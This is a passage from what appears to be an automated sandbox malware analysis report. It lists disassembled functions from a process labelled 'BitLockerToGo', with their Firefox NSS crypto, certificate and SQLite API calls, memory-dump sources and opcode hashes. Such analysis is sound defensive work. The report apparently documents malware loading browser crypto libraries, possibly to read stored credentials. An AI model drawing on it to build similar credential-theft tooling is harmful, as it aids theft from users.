                                                                                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C75087D
                                                                                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C750892
                                                                                                                                                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C75798A), ref: 6C7508AA
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,?,?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C7508C7
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,?,?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C7508E9
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C7508EF
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C757AE2,?,?,?,?,?,?,6C75798A), ref: 6C75090E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3145526462-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8593c10a8583a9d6f7f9be295ed8b050ef93fe4c5fea68ac319ccc1a7cc6dc1a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f3dd1b7fd9c7ff1199db07a1d89aa3e6d2a128965647f308ec29c910f689799c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8593c10a8583a9d6f7f9be295ed8b050ef93fe4c5fea68ac319ccc1a7cc6dc1a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E1160B5B022508BFF00AF99EA49B4A3778AB4225DF5D0134E81697750DF31F8258BD2
                                                                                                                                                                                                                                                                                                                                                          Function 6C643C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,6C6B460B,?,?), ref: 6C643CA9
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C643CB9
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6C643CC9
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(00000000), ref: 6C643CD6
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C643CE6
                                                                                                                                                                                                                                                                                                                                                          • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C643CF6
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C643D03
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C643D15
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1376842649-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: df0879116e7497a849be08183c36c73c4b71182f51ecf21d6fc06b017cc5b925
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2a72b87df1e5479f39bbf4b1cad3d65c433a1573f05bfca177f956272ef2e867
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df0879116e7497a849be08183c36c73c4b71182f51ecf21d6fc06b017cc5b925
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F51102B6A00505ABEF012A25AC058AB3AB8EB0325DF19C130ED1C83711FB22D85886D9
                                                                                                                                                                                                                                                                                                                                                          Function 6C649C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6611C0: PR_NewLock.NSS3 ref: 6C661216
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C649E17
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C649E25
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C649E4E
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C649EA2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C659500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C659546
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C649EB6
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C649ED9
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C649F18
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3381623595-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2fc7888b69b70a4d33049007a97c525a533f357559ccae050ae72bd8390a309b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 93372f5ac3a902ad8e4c012eebac347fb7cd097c059cde3d580156ed3982699b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc7888b69b70a4d33049007a97c525a533f357559ccae050ae72bd8390a309b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D81F7B1A40601ABEB109F34DD41AAB77E9FF4634CF14C528E84987B41FB31E925C79A
                                                                                                                                                                                                                                                                                                                                                          Function 6C65DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: DeleteCriticalSection.KERNEL32(D958E852,6C661397,5B5F5EC0,?,?,6C65B1EE,2404110F,?,?), ref: 6C65AB3C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: free.MOZGLUE(D958E836,?,6C65B1EE,2404110F,?,?), ref: 6C65AB49
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: DeleteCriticalSection.KERNEL32(5D5E6C85), ref: 6C65AB5C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: free.MOZGLUE(5D5E6C79), ref: 6C65AB63
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C65AB6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C65AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C65AB76
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C65DCFA
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C65DD0E
                                                                                                                                                                                                                                                                                                                                                          • PK11_IsFriendly.NSS3(?), ref: 6C65DD73
                                                                                                                                                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C65DD8B
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65DE81
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C65DEA6
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C65DF08
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 519503562-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1c5741c64dd9bd57f66a8862318843ab1a67198f8a85416e8c328aaebcc11aab
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: abd5c2e0e5b4f581fb95608a67f2df791cab8228b074cc9992fbf217d0dc46d2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c5741c64dd9bd57f66a8862318843ab1a67198f8a85416e8c328aaebcc11aab
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3691E6B5A001059FEB00CF68C980BAAB7B1FF45308FB44125DC199BB91E731E966CB99
                                                                                                                                                                                                                                                                                                                                                          Function 6C5C4F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5C4FC4
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5C51BB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C5C51B4
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5C51A5
                                                                                                                                                                                                                                                                                                                                                          • unable to delete/modify user-function due to active statements, xrefs: 6C5C51DF
                                                                                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C5C51AF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_logstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3619038524-4115156624
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ea4bcf741ad1178a37a0f3d1a0a8bf06de7d83f7eeb20f54f5d1d2bbc5b1302b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c46146aa2261e4886891b3c973933ebd91d0c6ad5373b7e69876e822d3394e4f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea4bcf741ad1178a37a0f3d1a0a8bf06de7d83f7eeb20f54f5d1d2bbc5b1302b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F971AEB57042099BEB00CED5CD84B9A77B5BF48308F844528FD19DBB81D735E950DBA2
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B29E0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6C6B21DD,00000000), ref: 6C6B2A47
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeInteger_Util.NSS3(?,6C6B21DD,00000002,00000000,00000000,?,?,6C6B21DD,00000000), ref: 6C6B2A60
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6C6B21DD,00000000), ref: 6C6B2A8E
                                                                                                                                                                                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6B2AE9
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C6B2B0D
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C6B2B7B
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C6B2BD6
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1625981074-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 996cb26b5806719adab46b700d1b8e027266d66b884975fffaaafc4993e06ca8
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 894fa4cbc18b5adcd1de902242f6925121cca1ab51dcc337a0830dd75ff817f2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 996cb26b5806719adab46b700d1b8e027266d66b884975fffaaafc4993e06ca8
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B65117B1E002069BEB108E65DC84FAA77F5AF4531CF150134ED19BB782EB31E925C799
                                                                                                                                                                                                                                                                                                                                                          Function 6C68AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C68AB3E,?,?,?), ref: 6C68AC35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C66CF16
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C68AB3E,?,?,?), ref: 6C68AC55
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C68AB3E,?,?), ref: 6C68AC70
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66E300: TlsGetValue.KERNEL32 ref: 6C66E33C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66E300: EnterCriticalSection.KERNEL32(?), ref: 6C66E350
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66E300: PR_Unlock.NSS3(?), ref: 6C66E5BC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C66E5CA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66E300: TlsGetValue.KERNEL32 ref: 6C66E5F2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66E300: EnterCriticalSection.KERNEL32(?), ref: 6C66E606
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66E300: PORT_Alloc_Util.NSS3(?), ref: 6C66E613
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C68AC92
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C68AB3E), ref: 6C68ACD7
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C68AD10
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C68AD2B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66F360: TlsGetValue.KERNEL32(00000000,?,6C68A904,?), ref: 6C66F38B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66F360: EnterCriticalSection.KERNEL32(?,?,?,6C68A904,?), ref: 6C66F3A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C66F360: PR_Unlock.NSS3(?,?,?,?,6C68A904,?), ref: 6C66F3D3
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2926855110-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1d894bb7578d1b5ba0c79bfdc17886169f8bd37402d0ddd5e64ed2109b92a7b4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 479552ac4f2610dae3a2526d335ed33122d6dee5ba9b9f4cd7a5667ff7e5e37b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d894bb7578d1b5ba0c79bfdc17886169f8bd37402d0ddd5e64ed2109b92a7b4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE3127B1E016055FEB008F69CC409AF77B6AF85328B188128EC159BB81EB31DD15C7B9
                                                                                                                                                                                                                                                                                                                                                          Function 6C642920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C64294E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C641D97,?,?), ref: 6C6A1836
                                                                                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C64296A
                                                                                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C642991
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A1820: PR_SetError.NSS3(FFFFE005,00000000,?,6C641D97,?,?), ref: 6C6A184D
                                                                                                                                                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6429AF
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C642A29
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C642A50
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C642A79
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
